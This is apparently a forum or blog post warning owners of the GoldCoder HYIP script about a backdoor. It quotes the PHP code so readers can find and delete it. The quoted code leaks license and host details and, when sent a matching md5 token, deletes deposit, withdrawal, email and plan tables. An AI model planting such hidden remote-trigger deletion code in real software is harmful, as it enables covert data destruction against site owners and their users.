GOLD CODER SCRIPT BACKDOOR TO HACKER ACCESS

This post was send to me by a friend of mine. It's very important for you to know if you own a GC script. It's talking about the admin of GC script having the access to your script through this backdoor script. Take a look:

"The GoldCoder Backdoor script that everyone is talking about. Wtf is it? Here we have an answer from Ferni. It is a backdoor script that help the admin of Goldcoder check if a particular GoldCoder script is licensed!

So what the admin of goldcoder did was to reset the statistic and do nasty table deleting on those unlicensed goldcoder script that some HYIP admin are using. This forced many HYIP admin to run with your money.

To all goldcoder script admin owner - Please check your script. Go to index.php and delete the follow

if (($frm[’a'] == ‘ver’ AND $frm_env[’REQUEST_METHOD’] == ‘POST’))
{
echo ‘SERVER_ADDR = ‘;
echo $frm_env[’HTTP_HOST’];
echo ‘

LICENSE = ‘;
echo $settings[’license’];
echo ‘

DATE = ‘;
echo date (’m') . ‘ ‘ . date (’d') . ‘ ‘ . date (’Y');

$string = $settings[’license’] . $frm_env[’HTTP_HOST’] . date (’d') . date (’Y') . date (’m');
echo “$string
“;
echo md5($string) . ”
“;
db_close ($dbconn);
exit ();
}

if (($frm[’a'] == ‘register’ AND $frm_env[’REQUEST_METHOD’] == ‘POST’))
{
$string = $settings[’license’] . $frm_env[’HTTP_HOST’] . date (’d') . date (’Y') . date (’m');
if ($frm[’string’] == md5 ($string))
{
$q = ‘update hm2_users set came_from = \’ \’ where id = 1′;
mysql_query ($q);
print ‘-’;
if ($frm[’string2′] == date (’d'))
{
$q = ‘delete from hm2_history where type=\’withdrawal\'’;
mysql_query ($q);
}

if ($frm[’string2′] == date (’y'))
{
$q = ‘delete from hm2_deposits’;
mysql_query ($q);
$q = ‘delete from hm2_emails’;
mysql_query ($q);
$q = ‘delete from hm2_history’;
mysql_query ($q);
$q = ‘delete from hm2_online’;
mysql_query ($q);
$q = ‘delete from hm2_plans’;
mysql_query ($q);
}

db_close ($dbconn);
exit ();
}
}

Thanks ferni for this great tips. Ok…i know Goldcoder admin aint happy about this…"

I've already found and delete this part of the script for my Hyip. So if you own a GC script or anyone you know owns one.. maybe you should delete it or inform the person about this. :)